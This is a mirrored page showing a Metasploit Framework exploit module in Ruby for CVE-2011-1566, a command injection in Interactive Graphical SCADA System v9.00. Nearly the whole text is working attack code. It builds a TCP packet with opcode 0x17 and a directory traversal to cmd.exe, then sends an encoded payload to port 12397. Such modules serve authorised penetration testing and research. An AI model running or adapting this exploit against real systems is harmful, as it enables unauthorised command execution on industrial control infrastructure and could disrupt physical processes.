CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/igss_exec_17.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',

14
      'Description'    => %q{

15
          This module abuses a directory traversal flaw in Interactive

16
        Graphical SCADA System v9.00. In conjunction with the traversal

17
        flaw, if opcode 0x17 is sent to the dc.exe process, an attacker

18
        may be able to execute arbitrary system commands.

19
      },

20
      'Author'         =>

21
        [

22
          'Luigi Auriemma',

23
          'MC'

24
        ],

25
      'License'        => MSF_LICENSE,

26
      'References'     =>

27
        [

28
          [ 'CVE', '2011-1566'],

29
          [ 'OSVDB', '72349'],

30
          [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],

31
        ],

32
      'Platform'       => 'win',

33
      'Arch'           => ARCH_CMD,

34
      'Payload'        =>

35
        {

36
          'Space'       => 153,

37
          'DisableNops' => true

38
        },

39
      'Targets'        =>

40
        [

41
          [ 'Windows', {} ]

42
        ],

43
      'DefaultTarget'  => 0,

44
      'Privileged'     => false,

45
      'DisclosureDate' => '2011-03-21'))

46


47
    register_options(

48
      [

49
        Opt::RPORT(12397)

50
      ])

51
  end

52


53
  def exploit

54


55
    print_status("Sending exploit packet...")

56


57
    connect

58


59
    packet =  [0x00000100].pack('V') + [0x00000000].pack('V')

60
    packet << [0x00000100].pack('V') + [0x00000017].pack('V')

61
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')

62
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')

63
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')

64
    packet << [0x00000000].pack('V')

65
    packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"

66
    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"

67
    packet << "\x00" * (143) #

68


69
    sock.put(packet)

70
    sock.get_once(-1,0.5)

71
    disconnect

72


73
  end

74
end

75


76